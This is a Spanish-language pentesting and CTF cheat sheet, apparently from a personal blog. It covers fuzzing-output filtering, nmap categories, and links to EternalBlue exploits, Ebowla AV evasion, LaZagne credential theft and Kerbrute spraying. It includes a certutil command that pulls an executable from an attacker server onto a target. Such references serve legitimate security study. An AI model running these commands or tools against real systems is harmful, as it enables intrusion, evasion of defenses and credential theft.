Herramientas y Técnicas para Pentesting y CTFs#
Este documento recopila diversas herramientas, técnicas y comandos utilizados en pentesting, CTFs y evaluaciones de seguridad. Está organizado por categorías para facilitar su consulta rápida.
Índice#
- Entornos Virtuales Python
- Manipulación de Resultados de Fuzzing
- Enumeración y Escaneo
- Explotación de Vulnerabilidades
- Pivoting y Movimiento Lateral
- Evasión de Defensas
- Ataques de Autenticación
- Herramientas de Búsqueda de Vulnerabilidades
- Transferencia de Archivos
- Sincronización de Tiempo
- Miscelánea
Entornos Virtuales Python#
🧪 ¿Qué es un entorno virtual?#
Es una carpeta aislada donde podés instalar paquetes de Python sin afectar el resto del sistema. Esto evita conflictos entre dependencias y permite tener múltiples proyectos con diferentes requisitos en la misma máquina.
✅ Cómo crear y usar un entorno virtual (Linux/macOS/WSL):#
nota personal: crea primero un directorio con el nombre de la herramienta
- Creá el entorno (por ejemplo, llamado
env):
virtualenv env
- Activalo:
source env/bin/activate
Verás que el prompt cambia, por ejemplo:
(env) tu-usuario@maquina:~/proyecto$
- Ahora podés instalar
urldedupeu otros paquetes sin afectar tu sistema:
git clone https://github.com/ameenmaali/urldedupe.git
cd urldedupe
pip install .
- Cuando termines, desactivás el entorno:
deactivate
Migración entre versiones de Python#
Para transformar un script de Python 2 a Python 3:
# Verificar versión de Python 3
python3 --version
# Realizar la conversión (vista previa)
python3 -m lib2to3 script.py
# Realizar la conversión permanente (modifica el archivo)
python3 -m lib2to3 -w -n script.py
# Ejecutar el script convertido
python3 script.py
Manipulación de Resultados de Fuzzing#
Filtrar códigos de estado HTTP#
# Extraer solo respuestas con código 200 y ordenarlas
grep 'Status: 200' resultados_ffuf.txt | awk '{print $1}' | sort -u > hits_200.txt
# Extraer redirecciones (302) en un archivo separado
grep 'Status: 302' resultados_ffuf.txt | awk '{print $1}' | sort -u > hits_302.txt
Agregar dominio base a endpoints descubiertos#
# Definir la URL base como variable de entorno
export TARGET=https://subdominio.com/
# Concatenar con cada endpoint encontrado
awk '{print ENVIRON["TARGET"] $1}' endpoints.txt > full_200.txt
Enumeración y Escaneo#
Categorías de scripts de Nmap#
Las categorías principales incluyen:
- auth: Scripts relacionados con autenticación
- broadcast: Para descubrimiento de hosts usando broadcast
- brute: Scripts para fuerza bruta
- default: Scripts ejecutados con la opción -sC
- discovery: Para descubrir servicios
- dos: Pruebas de denegación de servicio (¡cuidado!)
- exploit: Scripts que explotan vulnerabilidades
- external: Scripts que utilizan servicios externos
- fuzzer: Para fuzzear parámetros
- intrusive: Scripts que pueden ser detectados por defensas
- malware: Para detectar malware
- safe: Scripts considerados seguros, no intrusivos
- vuln: Para detectar vulnerabilidades específicas
Escaneo de cabeceras HTTP de seguridad#
# Uso de SSLyze para analizar cabeceras HTTP de seguridad
sslyze --http_headers <dominio> > sslyze_hsts_scan
Explotación de Vulnerabilidades#
EternalBlue (MS17-010)#
Repositorio con exploits y herramientas para MS17-010: https://github.com/worawit/MS17-010
Este repositorio incluye:
- Scanner para detectar sistemas vulnerables
- Exploits para diferentes versiones de Windows
- Scripts auxiliares para la explotación
Windows Exploit Suggester#
Windows Exploit Suggester Original https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- Descargar la base de datos más reciente:
python windows-exploit-suggester.py --update
- Analizar la salida de
systeminfopara encontrar vulnerabilidades:
python windows-exploit-suggester.py --database <archivo-db> --systeminfo systeminfo.txt
WESng (Windows Exploit Suggester - Next Generation) https://github.com/bitsadmin/wesng
Una versión mejorada que incluye:
- Base de datos actualizada
- Mejor rendimiento
- Menos falsos positivos
Exploits binarios de Offensive Security#
Colección de exploits binarios compilados y listos para usar: https://gitlab.com/exploit-database/exploitdb-bin-sploits
Pivoting y Movimiento Lateral#
Ligolo-ng - Herramienta de pivoting automático#
https://github.com/nicocha30/ligolo-ng
Tutorial detallado: Explicación de Xerosec
Ligolo-ng es una herramienta moderna de pivoting que permite:
- Reenvío de puertos transparente
- Pivoting a través de múltiples hosts
- Tunneling para protocolos TCP/UDP
- Interfaz de usuario intuitiva
Evasión de Defensas#
Ebowla - Framework para ofuscación de malware#
https://github.com/Genetic-Malware/Ebowla
Ebowla permite:
- Ofuscar ejecutables y scripts de PowerShell/Python
- Usar técnicas de cifrado basadas en entorno
- Evadir mecanismos de defensa como Windows Defender
- Generar carga útil polimórfica
Ataques de Autenticación#
LaZagne - Herramienta de recuperación de credenciales#
https://github.com/AlessandroZ/LaZagne
LaZagne es una herramienta de código abierto que permite:
- Recuperar contraseñas almacenadas en un sistema local
- Extraer credenciales de navegadores, clientes de correo, etc.
- Obtener contraseñas de aplicaciones comunes (FileZilla, WiFi, etc.)
- Funciona en Windows, Linux y macOS
Kerbrute - Herramienta para ataques Kerberos#
https://github.com/ropnop/kerbrute
Kerbrute es una herramienta rápida para:
- Enumerar usuarios en un dominio Active Directory
- Realizar ataques de password spraying
- Búsqueda de cuentas ASREPRoastables
- Realizar ataques de fuerza bruta contra cuentas
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
# Compilar o descargar binarios precompilados
Herramientas de Búsqueda de Vulnerabilidades#
Vulners - Base de datos de exploits#
https://vulners.com/githubexploit/1321A903-80B8-56C5-A776-516C0F848CB8
Vulners es un motor de búsqueda de vulnerabilidades que permite:
- Encontrar exploits para servicios específicos
- Correlacionar CVEs con exploits disponibles
- Acceder a una extensa base de datos de vulnerabilidades
XSS0r - Herramienta para descubrir XSS#
XSS0r permite:
- Detectar vulnerabilidades XSS en aplicaciones web
- Generar payloads personalizados
- Automatizar la búsqueda de puntos de inyección
Transferencia de Archivos#
Descarga de archivos en Windows con certutil.exe#

# En el sistema Windows objetivo
certutil.exe -urlcache -f http://servidor-atacante/archivo.exe archivo.exe
Certutil es una herramienta nativa de Windows que puede usarse para:
- Descargar archivos desde un servidor remoto
- Codificar/decodificar archivos en base64
- Evitar restricciones en la ejecución de PowerShell
- Funciona incluso en sistemas endurecidos
Sincronización de Tiempo#
Sincronizar reloj para ataques Kerberos#
# Sincronizar el reloj con un controlador de dominio
ntpdate <ip-del-controlador-dominio>
La sincronización precisa del tiempo es crucial para:
- Ataques de Kerberoasting
- Explotación de Golden/Silver Tickets
- Prevenir errores en autenticación Kerberos (tolerancia ±5 minutos)
- Evitar problemas con tickets de autenticación
Nota: Este documento se actualiza regularmente con nuevas herramientas y técnicas. Última actualización: 2025-08-13.
Josfull — Creador, escritor y pentester detrás de cada línea de este sitio.
